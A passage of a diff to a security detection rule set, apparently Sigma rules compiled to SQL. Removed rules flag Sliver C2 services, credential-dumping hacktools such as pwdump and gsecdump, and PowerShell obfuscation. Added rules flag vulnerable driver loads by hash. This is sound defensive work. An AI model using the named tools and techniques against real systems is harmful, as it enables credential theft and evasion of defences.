'%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "status": "experimental", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE '%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE '%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE '%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE '%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE '%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd39a86852b498b891672ffbcd071c03%' ESCAPE '\\' OR Hashes LIKE '%MD5=b2a9ac0600b12ec9819e049d7a6a0b75%' ESCAPE '\\' OR Hashes LIKE '%MD5=444f538daa9f7b340cfd43974ed43690%' ESCAPE '\\' OR Hashes LIKE '%MD5=7b43dfd84de5e81162ebcfafb764b769%' ESCAPE '\\' OR Hashes LIKE '%MD5=13dda15ef67eb265869fc371c72d6ef0%' ESCAPE '\\' OR Hashes LIKE '%MD5=300c5b1795c9b6cc1bc4d7d55c7bbe85%' ESCAPE '\\' OR Hashes LIKE '%MD5=1392b92179b07b672720763d9b1028a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=2e1f8a2a80221deb93496a861693c565%' ESCAPE '\\' OR Hashes LIKE '%MD5=8065a7659562005127673ac52898675f%' ESCAPE '\\' OR Hashes LIKE '%MD5=b5ada7fd226d20ec6634fc24768f9e22%' ESCAPE '\\' OR Hashes LIKE '%MD5=84fb76ee319073e77fb364bbbbff5461%' ESCAPE '\\' OR Hashes LIKE '%MD5=daf800da15b33bf1a84ee7afc59f0656%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7393fb917aed182e4cbef25ce8af950%' ESCAPE '\\' OR Hashes LIKE '%MD5=120b5bbb9d2eb35ff4f62d79507ea63a%' ESCAPE '\\' OR Hashes LIKE '%MD5=73c98438ac64a68e88b7b0afd11ba140%' ESCAPE '\\' OR Hashes LIKE '%MD5=51207adb8dab983332d6b22c29fe8129%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a23e0f2c6f926a41b28d574cbc6ac30%' ESCAPE '\\' OR Hashes LIKE '%MD5=20125794b807116617d43f02b616e092%' ESCAPE '\\' OR Hashes LIKE '%MD5=e8ebba56ea799e1e62748c59e1a4c586%' ESCAPE '\\' OR Hashes LIKE '%MD5=8abbb12e61045984eda19e2dc77b235e%' ESCAPE '\\' OR Hashes LIKE '%MD5=f66b96aa7ae430b56289409241645099%' ESCAPE '\\' OR Hashes LIKE '%MD5=97e3a44ec4ae58c8cc38eefc613e950e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ff7b31fa6e9ab923bce8af31d1be5bb2%' ESCAPE '\\' OR Hashes LIKE '%MD5=12908c285b9d68ee1f39186110df0f1e%' ESCAPE '\\' OR Hashes LIKE '%MD5=6126065af2fc2639473d12ee3c0c198e%' ESCAPE '\\' OR Hashes LIKE '%MD5=356bda2bf0f6899a2c08b2da3ec69f13%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd7de498a72b2daf89f321d23948c3c4%' ESCAPE '\\' OR Hashes LIKE '%MD5=338a98e1c27bc76f09331fcd7ae413a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=c9a293762319d73c8ee84bcaaf81b7b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9e786bdba458b8b4f9e93d034f73d00%' ESCAPE '\\' OR Hashes LIKE '%MD5=a17c58c0582ee560c72f60764ed63224%' ESCAPE '\\' OR Hashes LIKE '%MD5=21e13f2cb269defeae5e1d09887d47bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=a57b47489febc552515778dd0fd1e51c%' ESCAPE '\\' OR Hashes LIKE '%MD5=d6e9f6c67d9b3d790d592557a7d57c3c%' ESCAPE '\\' OR Hashes LIKE '%MD5=76bb1a4332666222a8e3e1339e267179%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cd158a64f3d886357535382a6fdad75%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9e7e5bcc5b01915dbcef7762a7fc329%' ESCAPE '\\' OR Hashes LIKE '%MD5=d253c19194a18030296ae62a10821640%' ESCAPE '\\' OR Hashes LIKE '%MD5=b12d1630fd50b2a21fd91e45d522ba3a%' ESCAPE '\\' OR Hashes LIKE '%MD5=50b39072d0ee9af5ef4824eca34be6e3%' ESCAPE '\\' OR Hashes LIKE '%MD5=778b7feea3c750d44745d3bf294bd4ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=0761c357aed5f591142edaefdf0c89c8%' ESCAPE '\\' OR Hashes LIKE '%MD5=23cf3da010497eb2bf39a5c5a57e437c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c49a1956a6a25ffc25ad97d6762b0989%' ESCAPE '\\' OR Hashes LIKE '%MD5=f406c5536bcf9bacbeb7ce8a3c383bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=f2f728d2f69765f5dfda913d407783d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b817d0e7714b9d43db43ae4a22a161e%' ESCAPE '\\' OR Hashes LIKE '%MD5=715f8efab1d1c660e4188055c4b28eed%' ESCAPE '\\' OR Hashes LIKE '%MD5=a01c412699b6f21645b2885c2bae4454%' ESCAPE '\\' OR Hashes LIKE '%MD5=010c0e5ac584e3ab97a2daf84cf436f5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5db81974ffda566fa821400419f59be%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014ba35d406475311a2eab0c4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d487f77be4471900d6ccbc47242cc25%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f2888e57fdd6aee466962c25ba7d62d%' ESCAPE '\\' OR Hashes LIKE '%MD5=507a649eb585d8d0447eab0532ef0c73%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11%' ESCAPE '\\' OR Hashes LIKE '%MD5=cd9f0fcecf1664facb3671c0130dc8bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=b10b210c5944965d0dc85e70a0b19a42%' ESCAPE '\\' OR Hashes LIKE '%MD5=ae5eb2759305402821aeddc52ba9a6d6%' ESCAPE '\\' OR Hashes LIKE '%MD5=f5051c756035ef5de9c4c48bacb0612b%' ESCAPE '\\' OR Hashes LIKE '%MD5=1898ceda3247213c084f43637ef163b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=37086ae5244442ba552803984a11d6cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=825703c494e0d270f797f1ecf070f698%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\' OR Hashes LIKE '%MD5=75d6c3469347de1cdfa3b1b9f1544208%' ESCAPE '\\' OR Hashes LIKE '%MD5=9ab9f3b75a2eb87fafb1b7361be9dfb3%' ESCAPE '\\' OR Hashes LIKE '%MD5=5f9785e7535f8f602cb294a54962c9e7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7d46d0ddaf8c7e1776a70c220bf47524%' ESCAPE '\\' OR Hashes LIKE '%MD5=f9844524fb0009e5b784c21c7bad4220%' ESCAPE '\\' OR Hashes LIKE '%MD5=828bb9cb1dd449cd65a29b18ec46055f%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d17b32be70ef39eae5d5edeb5e89877%' ESCAPE '\\' OR Hashes LIKE '%MD5=2391fb461b061d0e5fccb050d4af7941%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d4159694e1754f262e326b52a3b305a%' ESCAPE '\\' OR Hashes LIKE '%MD5=a60c9173563b940203cf4ad38ccf2082%' ESCAPE '\\' OR Hashes LIKE '%MD5=63e333d64a8716e1ae59f914cb686ae8%' ESCAPE '\\' OR Hashes LIKE '%MD5=a9f220b1507a3c9a327a99995ff99c82%' ESCAPE '\\' OR Hashes LIKE '%MD5=c5f5d109f11aadebae94c77b27cb026f%' ESCAPE '\\' OR Hashes LIKE '%MD5=5bab40019419a2713298a5c9173e5d30%' ESCAPE '\\' OR Hashes LIKE '%MD5=c996d7971c49252c582171d9380360f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=98763a3dee3cf03de334f00f95fc071a%' ESCAPE '\\' OR Hashes LIKE '%MD5=e79c91c27df3eaf82fb7bd1280172517%' ESCAPE '\\' OR Hashes LIKE '%MD5=a42249a046182aaaf3a7a7db98bfa69d%' ESCAPE '\\' OR Hashes LIKE '%MD5=803a371a78d528a44ef8777f67443b16%' ESCAPE '\\' OR Hashes LIKE '%MD5=9007c94c9d91ccff8d7f5d4cdddcc403%' ESCAPE '\\' OR Hashes LIKE '%MD5=11fb599312cb1cf43ca5e879ed6fb71e%' ESCAPE '\\' OR Hashes LIKE '%MD5=7f9309f5e4defec132b622fadbcad511%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=8636fe3724f2bcba9399daffd6ef3c7e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9dfd73dadb2f1c7e9c9d2542981aaa63%' ESCAPE '\\' OR Hashes LIKE '%MD5=490b1f404c4f31f4538b36736c990136%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d063c9422a19944cdaa6714623f2ec%' ESCAPE '\\' OR Hashes LIKE '%MD5=dacb62578b3ea191ea37486d15f4f83c%' ESCAPE '\\' OR Hashes LIKE '%MD5=2da209dde8188076a9579bd256dc90d0%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ba6afe0ea182236f98365bd977adfdf%' ESCAPE '\\' OR Hashes LIKE '%MD5=4c016fd76ed5c05e84ca8cab77993961%' ESCAPE '\\' OR Hashes LIKE '%MD5=ad22a7b010de6f9c6f39c350a471a440%' ESCAPE '\\' OR Hashes LIKE '%MD5=79483cb29a0c428e1362ec8642109eee%' ESCAPE '\\' OR Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%MD5=ccf523b951afaa0147f22e2a7aae4976%' ESCAPE '\\' OR Hashes LIKE '%MD5=736c4b85ce346ddf3b49b1e3abb4e72a%' ESCAPE '\\' OR Hashes LIKE '%MD5=b0baac4d6cbac384a633c71858b35a2e%' ESCAPE '\\' OR Hashes LIKE '%MD5=798de15f187c1f013095bbbeb6fb6197%' ESCAPE '\\' OR Hashes LIKE '%MD5=a86150f2e29b35369afa2cafd7aa9764%' ESCAPE '\\' OR Hashes LIKE '%MD5=b941c8364308990ee4cc6eadf7214e0f%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd04cd3de0c19bede84e9c95a86b3ca8%' ESCAPE '\\' OR Hashes LIKE '%MD5=6909b5e86e00b4033fedfca1775b0e33%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b91a44a488e4d539f2e55476b216024%' ESCAPE '\\' OR Hashes LIKE '%MD5=8b287636041792f640f92e77e560725e%' ESCAPE '\\' OR Hashes LIKE '%MD5=07f83829e7429e60298440cd1e601a6a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0395b4e0eb21693590ad1cfdf7044b8b%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b058945c9f2b8d8ebc485add1101ba5%' ESCAPE '\\' OR Hashes LIKE '%MD5=0067c788e1cb174f008c325ebde56c22%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2c1b8c00b99e913d992a870ed478a24%' ESCAPE '\\' OR Hashes LIKE '%MD5=84ba7af6ada1b3ea5efb9871a0613fc6%' ESCAPE '\\' OR Hashes LIKE '%MD5=dbc415304403be25ac83047c170b0ec2%' ESCAPE '\\' OR Hashes LIKE '%MD5=31469f1313871690e8dc2e8ee4799b22%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d465b4487dc81effaa84f122b71c24f%' ESCAPE '\\' OR Hashes LIKE '%MD5=64efbffaa153b0d53dc1bccda4279299%' ESCAPE '\\' OR Hashes LIKE '%MD5=b164daf106566f444dfb280d743bc2f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7c72a7e1d42b0790773efd8700e24952%' ESCAPE '\\' OR Hashes LIKE '%MD5=56a515173b211832e20fbc64e5a0447c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2eb4539a4f6ab6edd01bdc191619975%' ESCAPE '\\' OR Hashes LIKE '%MD5=d1bac75205c389d6d5d6418f0457c29b%' ESCAPE '\\' OR Hashes LIKE '%MD5=68dde686d6999ad2e5d182b20403240b%' ESCAPE '\\' OR Hashes LIKE '%MD5=a785b3bc4309d2eb111911c1b55e793f%' ESCAPE '\\' OR Hashes LIKE '%MD5=6ab7b8ef0c44e7d2d5909fdb58d37fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9ce18960c23f38706ae9c6584d9ac90%' ESCAPE '\\' OR Hashes LIKE '%MD5=ab53d07f18a9697139ddc825b466f696%' ESCAPE '\\' OR Hashes LIKE '%MD5=ba5f0f6347780c2ed911bbf888e75bef%' ESCAPE '\\' OR Hashes LIKE '%MD5=13ee349c15ee5d6cf640b3d0111ffc0e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9a237fa07ce3ed06ea924a9bed4a6b99%' 